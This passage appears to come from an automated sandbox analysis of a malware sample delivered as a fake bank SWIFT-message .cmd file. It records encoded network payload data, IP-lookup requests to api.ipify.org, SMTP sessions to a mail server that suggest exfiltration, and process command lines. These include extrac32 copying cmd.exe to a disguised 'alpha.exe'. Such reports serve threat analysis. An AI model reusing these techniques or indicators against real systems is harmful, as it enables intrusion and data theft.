                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 56 31 79 7a 71 30 36 6f 78 35 37 2b 62 72 6e 78 74 61 43 66 6e 69 75 55 33 39 35 4b 58 57 32 69 71 43 4c 71 7a 30 69 6d 44 75 4c 32 4c 66 6d 55 68 39 68 5a 31 37 54 42 46 77 6c 44 55 64 72 36 77 55 56 61 36 73 6b 71 53 6a 77 6d 4c 34 37 4f 53 59 75 6a 6f 73 33 74 45 4f 66 59 55 39 7a 4f 64 66 35 41 54 5a 37 32 42 6c 55 41 64 79 78 4c 31 2f 38 2f 37 37 7a 76 70 39 30 36 72 43 53 76 6f 72 56 63 75 65 50 54 39 72 66 5a 43 42 77 6f 74 51 54 39 47 41 52 4b 6f 37 46 42 4e 32 65 46 77 2b 63 57 47 35 30 59 67 69 46 64 6b 66 2f 67 42 76 4f 66 55 6d 2f 35 79 47 65 73 34 34 52 66 4a 6d 57 73 59 57 74 77 61 56 54 5a 6a 53 43 46 57 59 77 72 77 39 43 54 50 47 31 75 58 58 47 79 78 4e 63 43 65 65 31 6c 74 5a 4e 4a 38 45 51 62 51 51 68 71 66 35 52 5a 72 6b 79 61 6d 75 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: V1yzq06ox57+brnxtaCfniuU395KXW2iqCLqz0imDuL2LfmUh9hZ17TBFwlDUdr6wUVa6skqSjwmL47OSYujos3tEOfYU9zOdf5ATZ72BlUAdyxL1/8/77zvp906rCSvorVcuePT9rfZCBwotQT9GARKo7FBN2eFw+cWG50YgiFdkf/gBvOfUm/5yGes44RfJmWsYWtwaVTZjSCFWYwrw9CTPG1uXXGyxNcCee1ltZNJ8EQbQQhqf5RZrkyamuJ
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 6c 39 2f 45 49 52 64 4c 30 42 36 64 36 4f 4e 6e 70 65 76 48 76 48 42 74 64 7a 79 78 58 57 36 71 59 2b 51 35 6f 65 2f 36 4d 56 35 31 42 48 56 78 58 49 53 47 6c 65 2f 73 32 6c 52 75 6b 42 37 67 41 75 48 53 72 74 52 73 41 73 36 4b 42 42 4c 47 33 57 49 66 55 65 6a 47 45 4a 62 68 58 50 41 6f 62 35 2f 6e 51 63 78 51 49 58 43 55 35 77 31 37 4c 53 5a 34 70 57 4d 6f 47 6d 51 39 47 33 59 68 70 59 30 7a 34 39 51 58 38 36 42 49 55 61 4d 63 67 61 67 74 56 41 41 41 32 58 66 67 4e 43 62 61 79 46 45 49 48 67 51 32 51 79 52 59 38 54 4c 6c 39 7a 35 6d 77 46 2b 6b 76 61 55 54 63 58 72 6e 45 75 47 38 66 6a 45 32 50 6a 50 61 34 69 65 75 79 52 4c 48 37 74 64 75 5a 36 4f 74 64 39 6d 35 41 50 76 50 37 4b 68 2f 66 6d 50 39 66 2b 77 35 53 70 78 69 77 53 6d 58 32 75 5a 4e 66 78 52
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: l9/EIRdL0B6d6ONnpevHvHBtdzyxXW6qY+Q5oe/6MV51BHVxXISGle/s2lRukB7gAuHSrtRsAs6KBBLG3WIfUejGEJbhXPAob5/nQcxQIXCU5w17LSZ4pWMoGmQ9G3YhpY0z49QX86BIUaMcgagtVAAA2XfgNCbayFEIHgQ2QyRY8TLl9z5mwF+kvaUTcXrnEuG8fjE2PjPa4ieuyRLH7tduZ6Otd9m5APvP7Kh/fmP9f+w5SpxiwSmX2uZNfxR
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 4d 6c 76 2f 6a 6e 6d 6b 50 54 4b 36 66 42 4f 6f 4d 50 43 46 55 42 4e 39 6a 30 45 42 46 32 7a 67 6d 62 55 38 61 4f 55 61 41 6d 43 66 76 6d 6c 68 61 35 50 4c 65 36 50 65 37 4a 36 59 6d 6a 6a 30 6e 75 46 59 6c 32 78 73 65 4a 6a 51 41 56 74 6e 53 6b 65 42 55 72 47 4f 42 48 31 79 2f 43 32 4d 68 4e 49 4b 4c 73 43 6d 38 63 78 71 62 34 32 70 4b 33 4b 36 36 51 55 4b 64 62 2b 6d 35 47 41 35 47 6c 67 47 35 58 72 46 2b 70 68 68 75 66 73 63 52 76 62 46 31 58 50 70 61 33 52 45 53 6e 39 34 4d 46 48 70 2f 62 44 77 75 42 39 4a 62 32 32 63 50 61 4a 69 31 57 71 6e 45 55 6f 79 2f 68 44 61 6e 4b 7a 37 75 47 51 57 4d 68 6a 42 47 6c 52 71 53 49 49 5a 30 54 73 33 4e 62 58 30 73 48 6b 66 59 52 73 47 32 75 75 62 73 48 66 77 68 42 49 58 45 36 4d 37 62 56 42 75 51 54 35 67 68 69 36
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Mlv/jnmkPTK6fBOoMPCFUBN9j0EBF2zgmbU8aOUaAmCfvmlha5PLe6Pe7J6Ymjj0nuFYl2xseJjQAVtnSkeBUrGOBH1y/C2MhNIKLsCm8cxqb42pK3K66QUKdb+m5GA5GlgG5XrF+phhufscRvbF1XPpa3RESn94MFHp/bDwuB9Jb22cPaJi1WqnEUoy/hDanKz7uGQWMhjBGlRqSIIZ0Ts3NbX0sHkfYRsG2uubsHfwhBIXE6M7bVBuQT5ghi6
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:14 UTC16384INData Raw: 6c 49 36 6e 50 4a 4a 67 6e 61 72 57 71 35 44 39 37 64 39 6c 30 37 46 6b 44 4c 53 5a 65 30 38 4b 71 6a 61 45 67 58 58 38 58 48 56 46 52 41 70 74 68 55 4f 56 73 68 71 58 37 46 43 2b 42 5a 4f 76 79 56 6f 72 46 54 62 30 2b 72 76 51 66 53 37 4c 59 45 59 4c 54 66 6c 48 78 49 30 73 6b 75 6c 6c 56 50 31 45 70 50 71 4a 72 32 77 69 6d 41 46 69 65 69 55 66 34 51 6c 2b 42 47 44 4a 36 48 76 37 65 30 46 79 36 6b 45 48 76 6d 7a 43 65 71 67 6b 75 68 4f 42 43 54 75 33 31 63 5a 45 52 4c 6f 52 71 47 4b 6c 6d 74 62 78 37 6d 4b 46 48 4c 4a 7a 65 6b 50 66 79 68 51 45 64 45 57 4f 4d 45 76 58 57 55 76 37 64 4c 51 50 4e 67 6c 4e 76 36 47 51 36 68 6c 50 77 78 6a 49 79 33 51 6a 6a 4d 53 68 31 4f 53 53 79 2f 6e 57 52 6d 34 35 61 65 77 72 63 6b 5a 41 61 6d 6c 64 44 67 4a 32 54 73 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: lI6nPJJgnarWq5D97d9l07FkDLSZe08KqjaEgXX8XHVFRApthUOVshqX7FC+BZOvyVorFTb0+rvQfS7LYEYLTflHxI0skullVP1EpPqJr2wimAFieiUf4Ql+BGDJ6Hv7e0Fy6kEHvmzCeqgkuhOBCTu31cZERLoRqGKlmtbx7mKFHLJzekPfyhQEdEWOMEvXWUv7dLQPNglNv6GQ6hlPwxjIy3QjjMSh1OSSy/nWRm45aewrckZAamldDgJ2TsZ
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:14 UTC16384INData Raw: 44 76 6c 4e 6f 58 78 47 76 52 57 4c 6c 4e 74 6a 49 2f 69 7a 57 63 79 4a 54 6d 4b 53 63 77 32 64 71 72 63 56 6a 67 4c 61 68 44 61 37 65 48 50 6c 71 48 6d 62 64 6a 4c 6f 44 5a 72 46 68 2f 35 4d 38 2f 54 42 77 54 46 6c 6e 32 31 6d 5a 73 38 66 4b 47 6f 79 42 73 68 4e 77 46 34 52 41 61 2f 58 6a 6b 2f 4c 78 59 66 61 65 70 6d 4d 65 59 4e 6b 73 33 6b 75 72 39 46 56 61 51 35 46 59 46 5a 73 35 61 36 48 49 37 6e 64 56 75 63 52 44 58 52 76 4c 67 44 7a 4b 4b 30 43 47 38 35 4b 4d 41 58 4f 70 66 38 73 38 53 6a 35 47 62 52 34 65 57 70 39 62 6e 4f 37 73 6b 69 71 43 37 61 36 79 5a 34 77 63 32 34 61 64 79 74 79 78 35 62 52 48 58 6a 31 67 34 55 79 42 71 4e 4a 68 4f 38 4d 64 34 72 6c 6f 4d 62 43 4d 76 4c 58 67 55 2f 2f 75 64 79 32 57 56 4e 44 6f 48 4d 79 76 64 67 4c 67 4b 32
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: DvlNoXxGvRWLlNtjI/izWcyJTmKScw2dqrcVjgLahDa7eHPlqHmbdjLoDZrFh/5M8/TBwTFln21mZs8fKGoyBshNwF4RAa/Xjk/LxYfaepmMeYNks3kur9FVaQ5FYFZs5a6HI7ndVucRDXRvLgDzKK0CG85KMAXOpf8s8Sj5GbR4eWp9bnO7skiqC7a6yZ4wc24adytyx5bRHXj1g4UyBqNJhO8Md4rloMbCMvLXgU//udy2WVNDoHMyvdgLgK2
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:14 UTC16384INData Raw: 71 49 55 33 78 59 39 4a 6b 31 73 63 42 49 59 63 67 6e 2b 41 7a 58 67 78 50 62 62 64 32 47 79 45 77 73 63 44 44 36 37 68 51 49 45 72 75 57 32 4c 32 41 46 70 50 32 48 33 75 35 36 49 64 48 62 7a 34 36 32 78 5a 77 71 4f 64 52 48 59 49 47 59 66 51 44 73 6b 6b 51 64 58 74 4b 73 6f 44 38 62 6b 64 43 76 36 35 73 67 77 61 4d 46 72 66 68 42 75 69 75 37 43 36 49 34 4b 79 30 7a 52 56 57 65 38 55 63 4d 52 4a 33 37 6b 48 70 6b 7a 6e 58 5a 30 65 77 37 37 46 4a 6b 31 48 4d 67 65 54 52 76 7a 67 47 73 4a 33 65 78 65 36 53 35 31 4f 54 35 6a 37 68 4f 75 74 33 6a 65 30 2f 79 52 64 57 72 5a 77 59 57 62 49 56 34 32 65 2b 33 6a 4c 51 2b 4d 4b 44 6d 7a 79 53 32 66 73 58 42 77 37 55 50 41 67 41 52 71 44 4e 35 37 46 6c 66 30 57 4a 58 5a 4c 4e 74 38 6a 68 53 67 74 77 38 58 72 49 42
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: qIU3xY9Jk1scBIYcgn+AzXgxPbbd2GyEwscDD67hQIEruW2L2AFpP2H3u56IdHbz462xZwqOdRHYIGYfQDskkQdXtKsoD8bkdCv65sgwaMFrfhBuiu7C6I4Ky0zRVWe8UcMRJ37kHpkznXZ0ew77FJk1HMgeTRvzgGsJ3exe6S51OT5j7hOut3je0/yRdWrZwYWbIV42e+3jLQ+MKDmzyS2fsXBw7UPAgARqDN57Flf0WJXZLNt8jhSgtw8XrIB
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:14 UTC16384INData Raw: 6b 38 34 74 42 70 4e 6f 41 5a 5a 6b 6d 54 65 72 5a 32 58 30 72 74 4e 41 4c 46 69 63 76 75 36 36 66 6f 37 67 4a 5a 49 31 55 61 6e 42 64 55 56 63 51 68 61 61 64 72 56 58 2f 76 52 70 4d 35 58 71 63 2f 31 43 49 4b 63 4c 46 54 4a 76 44 55 32 32 6b 41 4a 4d 4e 71 59 61 6b 57 2f 4f 74 71 53 59 59 33 31 75 71 6b 6e 45 39 61 49 42 30 72 4d 68 61 58 4d 57 76 73 76 77 71 32 46 2b 31 37 44 54 45 78 47 54 6e 6a 4f 61 4e 5a 73 68 2f 6d 71 65 70 4d 48 76 50 32 6e 63 64 44 79 64 54 33 6f 6e 5a 51 69 31 6d 53 50 4c 5a 42 46 35 52 70 51 5a 63 70 45 72 64 6d 47 51 43 58 2b 45 31 52 6c 31 75 6e 6c 74 71 65 37 45 51 64 48 52 55 55 70 55 57 65 45 43 71 54 6d 2b 77 6c 6e 68 35 64 62 56 57 6c 4b 74 48 6d 66 5a 31 49 6b 34 66 48 71 67 55 32 4e 31 44 66 39 47 49 4b 5a 66 51 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: k84tBpNoAZZkmTerZ2X0rtNALFicvu66fo7gJZI1UanBdUVcQhaadrVX/vRpM5Xqc/1CIKcLFTJvDU22kAJMNqYakW/OtqSYY31uqknE9aIB0rMhaXMWvsvwq2F+17DTExGTnjOaNZsh/mqepMHvP2ncdDydT3onZQi1mSPLZBF5RpQZcpErdmGQCX+E1Rl1unltqe7EQdHRUUpUWeECqTm+wlnh5dbVWlKtHmfZ1Ik4fHqgU2N1Df9GIKZfQil


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      1192.168.2.749892104.26.13.2054432724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:53 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:53 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                      CF-RAY: 8e46bff5cbed47a2-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1595592&cwnd=251&unsent_bytes=0&cid=1ca3d7f37708a4fe&ts=347&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:53 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      2192.168.2.749996104.26.13.2054431260C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:21 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:21 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                      CF-RAY: 8e46c0a60f5b6b97-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1036&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=2724365&cwnd=251&unsent_bytes=0&cid=044496f8b9e58fa1&ts=557&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:21 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      3192.168.2.750000104.26.13.205443
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:25 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:25 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                      CF-RAY: 8e46c0bdaf004868-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=72ab252a2fd3d8b6&ts=201&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:57:25 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 155.94.241.187


                                                                                                                                                                                                                                                                                                                                                                                                                                      SMTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.237843037 CET5874992251.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:56:58 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.238058090 CET49922587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481767893 CET5874992251.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481972933 CET49922587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.726116896 CET5874992251.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945317984 CET5874995651.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:03 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945445061 CET49956587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184408903 CET5874995651.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184552908 CET49956587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424139977 CET5874995651.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.960288048 CET5875000251.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:26 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.960536003 CET50002587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.200715065 CET5875000251.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.202255011 CET50002587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.441956997 CET5875000251.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724092960 CET5875000751.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:30 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724270105 CET50007587192.168.2.751.195.88.199EHLO 124406
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963687897 CET5875000751.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 124406 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                      250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963881969 CET50007587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.203581095 CET5875000751.195.88.199192.168.2.7220 TLS go ahead

                                                                                                                                                                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6bfcd0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff61c760000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
